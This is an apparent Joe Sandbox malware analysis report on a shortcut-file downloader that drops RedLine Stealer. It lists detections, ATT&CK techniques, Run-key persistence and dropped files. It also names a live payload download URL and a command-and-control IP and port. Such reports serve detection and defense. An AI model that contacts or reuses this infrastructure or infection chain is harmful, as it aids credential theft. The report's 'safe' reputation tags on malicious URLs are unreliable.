                    Source: Yara matchFile source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 4768, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 5428, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 4768, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 5428, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1
                    Command and Scripting Interpreter                    		1
                    Registry Run Keys / Startup Folder                    		111
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping31
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		Exfiltration Over Other Network Medium11
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scripting                    		Boot or Logon Initialization Scripts1
                    Registry Run Keys / Startup Folder                    		1
                    Disable or Modify Tools                    		LSASS Memory11
                    Process Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		Exfiltration Over Bluetooth11
                    Non-Standard Port                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts4
                    PowerShell                    		Logon Script (Windows)Logon Script (Windows)21
                    Virtualization/Sandbox Evasion                    		Security Account Manager21
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Ingress Tool Transfer                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer3
                    Non-Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    Remote System Discovery                    		SSHKeyloggingData Transfer Size Limits14
                    Application Layer Protocol                    		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Scripting                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items3
                    Obfuscated Files or Information                    		DCSync12
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job3
                    Software Packing                    		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 796782 Sample: 07ff580e-3cfd-4c41-a92e-4ba... Startdate: 02/02/2023 Architecture: WINDOWS Score: 100 45 api.ip.sb 2->45 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 55 Windows shortcut file (LNK) starts blacklisted processes 2->55 57 13 other signatures 2->57 9 powershell.exe 14 20 2->9         started        14 Opgcxhsdw.exe 1 2->14         started        16 Opgcxhsdw.exe 1 2->16         started        signatures3 process4 dnsIp5 47 oiartzunirratia.eus 185.101.226.22, 443, 49696 HOSTINET_ASES Spain 9->47 43 C:\Users\user\AppData\Roaming\svhost.exe, PE32 9->43 dropped 67 Powershell drops PE file 9->67 18 svhost.exe 1 4 9->18         started        22 conhost.exe 1 9->22         started        69 Antivirus detection for dropped file 14->69 71 Windows shortcut file (LNK) starts blacklisted processes 14->71 73 Multi AV Scanner detection for dropped file 14->73 75 Machine Learning detection for dropped file 14->75 24 powershell.exe 14->24         started        77 Encrypted powershell cmdline option found 16->77 26 powershell.exe 16->26         started        file6 signatures7 process8 file9 41 C:\Users\user\AppData\...\Opgcxhsdw.exe, PE32 18->41 dropped 59 Antivirus detection for dropped file 18->59 61 Windows shortcut file (LNK) starts blacklisted processes 18->61 63 Multi AV Scanner detection for dropped file 18->63 65 3 other signatures 18->65 28 svhost.exe 15 3 18->28         started        31 powershell.exe 16 18->31         started        33 conhost.exe 24->33         started        35 conhost.exe 26->35         started        signatures10 process11 dnsIp12 49 194.26.192.248, 49697, 7053 HEANETIE Netherlands 28->49 37 conhost.exe 28->37         started        39 conhost.exe 31->39         started        process13

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk74%ReversingLabsShortcut.Downloader.Ploprolo
                    07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk59%VirustotalBrowse
                    07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk100%AviraTR/LNK.PSH.Downloader.Gen
                    07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe100%AviraTR/Dropper.MSIL.Gen
                    C:\Users\user\AppData\Roaming\svhost.exe100%AviraTR/Dropper.MSIL.Gen
                    C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\svhost.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe41%ReversingLabsByteCode-MSIL.Trojan.Heracles
                    C:\Users\user\AppData\Roaming\svhost.exe41%ReversingLabsByteCode-MSIL.Trojan.Heracles

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    2.0.svhost.exe.d30000.0.unpack100%AviraTR/Dropper.MSIL.GenDownload File
                    7.2.svhost.exe.400000.0.unpack100%AviraHEUR/AGEN.1234943Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    oiartzunirratia.eus0%VirustotalBrowse
                    api.ip.sb1%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                    https://go.micro0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                    http://james.newtonking.com/projects/json0%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    http://tempuri.org/Endpoint/0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
                    http://tempuri.org/00%URL Reputationsafe
                    194.26.192.248:70530%Avira URL Cloudsafe
                    https://oiartzunirratia.eus0%Avira URL Cloudsafe
                    http://194.26.192.248:70530%Avira URL Cloudsafe
                    http://oiartzunirratia.eus0%Avira URL Cloudsafe
                    http://194.26.192.248:7053/0%Avira URL Cloudsafe
                    194.26.192.248:70531%VirustotalBrowse
                    http://194.26.192.248:705340%Avira URL Cloudsafe
                    http://194.26.192.248:70531%VirustotalBrowse
                    https://oiartzunirratia.eusx0%Avira URL Cloudsafe
                    https://oiartzunirratia.eus0%VirustotalBrowse
                    http://oiartzunirratia.eus0%VirustotalBrowse
                    https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe0y0%Avira URL Cloudsafe
                    https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    oiartzunirratia.eus
                    		185.101.226.22
                    		truetrueunknown
                    api.ip.sb
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    194.26.192.248:7053true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://194.26.192.248:7053/true
                    • Avira URL Cloud: safe
                    		unknown
                    https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exetrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ipinfo.io/ip%appdata%svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                      		high
                      https://oiartzunirratia.euspowershell.exe, 00000000.00000002.328014232.000001D9DD5D1000.00000004.00000800.00020000.00000000.sdmptrue
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.378116200.000001D9EC443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://194.26.192.248:7053svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.org/botsvhost.exe, 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://tempuri.org/Endpoint/CheckConnectResponsesvhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://go.micropowershell.exe, 00000000.00000002.328014232.000001D9DDB4A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://tempuri.org/Endpoint/EnvironmentSettingssvhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.ip.sb/geoip%USERPEnvironmentROFILE%svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://oiartzunirratia.euspowershell.exe, 00000000.00000002.328014232.000001D9DD5E7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/soap/envelope/svhost.exe, 00000007.00000002.587473199.00000000032FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/soap/envelope/Dsvhost.exe, 00000007.00000002.587473199.0000000003303000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://tempuri.org/svhost.exe, 00000007.00000002.587473199.00000000032FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/Endpoint/CheckConnectsvhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/Endpoint/VerifyUpdateResponsesvhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/Endpoint/SetEnvironmentsvhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/Endpoint/SetEnvironmentResponsesvhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://james.newtonking.com/projects/jsonsvhost.exe, 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/Endpoint/GetUpdatessvhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://oiartzunirratia.eusxpowershell.exe, 00000000.00000002.328014232.000001D9DD5E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.ipify.orgcookies//settinString.Removegsvhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2004/08/addressingsvhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://194.26.192.248:70534svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultsvhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/Endpoint/GetUpdatesResponsesvhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe0ypowershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.378116200.000001D9EC443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.newtonsoft.com/jsonschemasvhost.exe, 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004760000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Endpoint/svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Endpoint/EnvironmentSettingsResponsesvhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Endpoint/VerifyUpdatesvhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/0svhost.exe, 00000007.00000002.587473199.00000000032FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.nuget.org/packages/Newtonsoft.Json.Bsonsvhost.exe, 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004760000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.328014232.000001D9DC2A1000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/soap/actor/nextsvhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  185.101.226.22
                                                  		oiartzunirratia.eusSpain
                                                  		56732HOSTINET_ASEStrue
                                                  194.26.192.248
                                                  		unknownNetherlands
                                                  		1213HEANETIEtrue

                                                  General Information

                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                  Analysis ID:796782
                                                  Start date and time:2023-02-02 08:08:11 +01:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 11m 23s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:18
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample file name:07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk
                                                  Detection:MAL
                                                  Classification:mal100.rans.troj.spyw.evad.winLNK@18/15@3/2
                                                  EGA Information:
                                                  • Successful, ratio: 66.7%
                                                  HDC Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 97%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .lnk

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                  • TCP Packets have been reduced to 100
                                                  • Excluded IPs from analysis (whitelisted): 104.26.12.31, 172.67.75.172, 104.26.13.31
                                                  • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net
                                                  • Execution Graph export aborted for target powershell.exe, PID 4852 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  08:09:13API Interceptor119x Sleep call for process: powershell.exe modified
                                                  08:10:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Opgcxhsdw "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe"
                                                  08:10:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Opgcxhsdw "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe"

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASNs

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svhost.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svhost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1039
                                                  Entropy (8bit):5.3436815157474165
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4Ks2EAE4Kzr7RKDE4KhK3VZ9pKhyE4KdE4KBLWE4Ks:MxHKXEAHKzvRYHKhQnoyHKdHKBqHKs
                                                  MD5:20799406D8EAB97C5485A916A278ED0D
                                                  SHA1:8547571BD0A17ED48FBECDE6D5E4749A66933D53
                                                  SHA-256:BDDBB29FA099BDEB1C409FE844BDA2820D0550E0C97F7A64E01A0EAE4DBDF067
                                                  SHA-512:CA887D0283B3B65BDFA91C90FAAD4C485B3861EEE54C1E6C3A7563DA77DD0D59AC20207259084E2A85E8FC25A48EB805E86904DA60B4C165B03B4A7D758C7506
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.Data, Version=4.0.0.0, Culture=neutra

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):9432
                                                  Entropy (8bit):4.924930598646688
                                                  Encrypted:false
                                                  SSDEEP:192:Gxoe5IpObxoe5lib4LVsm5emdzgkjDt4iWN3yBGHc9smgdcU6CkdcU6Cw9smqpOC:Xwib4Lokjh4iUxm44Qib4w
                                                  MD5:38AABE3B9AA93BFAB8A73614371C91B3
                                                  SHA1:FA8DFF5FA9309878D5B8AAE4789569842F004C18
                                                  SHA-256:F2239C11FA85634E700A10AC31606A9E80D88129B4155E5A1D5068655E6CC0EE
                                                  SHA-512:47DA224BD7DF769E9BD73FF9F1022EF3A7BBC70AD9348EF5F68CACC38553B2E1AEC00CBB15342EA940A2BB93FCAEF89C259B54FA6009CFD6DBE64EA66CDE9DA9
                                                  Malicious:false
                                                  Preview:PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16592
                                                  Entropy (8bit):5.410987074044769
                                                  Encrypted:false
                                                  SSDEEP:384:qt2/GhpBl5tq4S8pSVkuxA+ZQRbpwcKpGTrYv:YVPSeUkuxA+ZqGnkMv
                                                  MD5:310C4E7C2994D0CD5224D366263EF16C
                                                  SHA1:3EE7B1BFE08D17E86A520434913397849891C080
                                                  SHA-256:2E70621EAD1BAF4EFE995F61FE8B4B97127E093DCB4F763AD551793F07F38FA3
